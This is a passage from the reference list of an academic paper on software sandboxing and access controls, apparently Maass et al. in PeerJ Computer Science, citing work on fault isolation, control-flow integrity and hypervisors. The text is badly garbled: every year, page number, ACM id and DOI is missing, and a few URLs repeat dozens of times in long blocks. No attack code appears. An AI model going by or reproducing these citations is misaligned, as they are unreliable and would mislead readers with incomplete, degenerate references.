http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /peerj-cs. rosenberg d. . poking holes in apparmor profiles. available at http://blog.azimuthsecurity. com/ / /poking-holes-in-apparmor-profiles.html (accessed april ). saxena p, molnar d, livshits b. . scriptgard: automatic context-sensitive sanitization for large-scale legacy web applications. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . schneider fb. . towards fault-tolerant and secure agentry. in: international workshop on distributed algorithms (wdag ’ ). london: springer-verlag, – . available at http://dl.acm. org/citation.cfm?id= . . schreier m. . qualitative content analysis in practice. st edition. thousand oaks: sage publications ltd. schreuders zc, mcgill t, payne c. . the state of the art of application restrictions and sandboxes: a survey of application-oriented access controls and their shortfalls. computers & security : – doi . /j.cose. . . . sehr d, muth r, biffle c, khimenko v, pasko e, schimpf k, yee b, chen b. . adapting software fault isolation to contemporary cpu architectures. in: usenix security (usenix security’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm? id= . . seshadri a, luk m, qu n, perrig a. . secvisor: a tiny hypervisor to provide lifetime kernel code integrity for commodity oses. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . siefers j, tan g, morrisett g. . robusta: taming the native beast of the jvm. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . spearman c. . the proof and measurement of association between two things. american journal of psychology : – . stuckman j, purtilo j. . mining security vulnerabilities from linux distribution metadata. in: software reliability engineering workshops (issrew). washington, dc: ieee, – . sun w, sekar r, poothia g, karandikar t. . practical proactive integrity preservation: a basis for malware defense. in: ieee symposium on security and privacy (sp’ ). washington, dc: ieee computer society, – . szekeres l, payer m, wei t, song d. . eternal war in memory. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . tang j. . exploring control flow guard in windows . available at http://blog.trendmicro. com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / (accessed september ). tang s, mai h, king st. . trust and protection in the illinois browser operating system. in: usenix symposium on operating systems design and implementation (osdi) (osdi’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . wahbe r, lucco s, anderson te, graham sl. . efficient software-based fault isolation. acm sigops operating systems review ( ): – doi . / . . wallach ds, balfanz d, dean d, felten ew. . extensible security architectures for java. in: symposium on operating systems principles (sosp ’ ). new york: acm, – . wang hj, fan x, howell j, jackson c. . protection and communication abstractions for web browsers in mashupos. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/ / /poking-holes-in-apparmor-profiles.html http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /j.cose. . . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. wang z, jiang x, cui w, ning p. . countering kernel rootkits with lightweight hook protection. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . wartell r, mohan v, hamlen kw, lin z. . binary stirring: self-randomizing instruction addresses of legacy x binary code. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . weinstock cb, lipson hf, goodenough j. . arguing security: creating security assurance cases. technical report. software engineering institute, carnegie mellon university. williams d, reynolds p, walsh k, sirer eg, schneider fb. . device driver safety through a reference validation mechanism. in: usenix symposium on operating systems design and implementation (osdi) (osdi’ ). berkeley: usenix association, – . available at http:/ /dl.acm.org/citation.cfm?id= . . wurster g, van oorschot pc. . a control point for reducing root abuse of file-system privileges. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . xu r, saı̈di h, anderson r. . aurasium: practical policy enforcement for android applications. in: usenix security (security’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . yan y, menarini m, griswold w. . mining software contracts for software evolution. in: international conference on software maintenance and evolution (icsme). washington, d.c.: ieee, – . yee b, sehr d, dardyk g, chen jb, muth r, ormandy t, okasaka s, narula n, fullagar n. . native client: a sandbox for portable, untrusted x native code. in: ieee symposium on security and privacy. washington, dc: ieee, – . zeldovich n, boyd-wickizer s, kohler e, mazieres d. . making information flow explicit in histar. in: usenix symposium on operating systems design and implementation (osdi) (osdi ’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation. cfm?id= . . zeng b, tan g, erlingsson ú. . strato: a retargetable framework for low-level inlined-reference monitors. in: usenix security (sec’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . zeng b, tan g, morrisett g. . combining control-flow integrity and static analysis for efficient and validated data sandboxing. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . zhang f, chen j, chen h, zang b. . cloudvisor: retrofitting protection of virtual machines in multi-tenant cloud with nested virtualization. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . zhang m, sekar r. . control flow integrity for cots binaries. in: usenix security (sec’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . zhang c, wei t, chen z, duan l, szekeres l, mccamant s, song d, zou w. . practical control flow integrity and randomization for binary executables. in: ieee symposium on security and privacy. washington, dc: ieee computer society, – . zhong q, edwards n, rees o. . operating system support for the sandbox method and its application on mobile code security. technical report hpl- - . hp laboratories bristol. available at http://www.hpl.hp.com/techreports/ /hpl- - .pdf. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . 